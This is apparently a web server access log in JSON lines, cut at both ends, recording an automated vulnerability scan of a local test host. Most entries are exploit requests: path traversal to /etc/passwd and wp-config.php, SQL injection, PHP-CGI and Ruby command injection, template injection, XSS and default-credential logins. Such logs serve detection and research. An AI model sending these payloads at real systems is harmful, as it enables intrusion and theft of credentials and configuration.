/plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pme/database/pme/phinx.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/85 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yarn.lock HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /controller/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_all/_search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/eatery/nav.php?-Menu-=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/weathermap/configs/poc.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/ck/domenu.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /trace HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/86 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /template/custom/content-editor HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sm935/index.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/js/magmi_utils.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /controller/registry-clients HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/img/custom_icons/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /host-manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/views/ajax/autocomplete/user/a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hub/login?next= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/openid-configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/87 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /templates/editor-preload-container HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sm/ess.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /counters HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login_page.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /views/ajax/autocomplete/user/a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"{\x22metadata\x22:{\x22order_id\x22:\x221 and updatexml(1,concat(0x7e,(SELECT 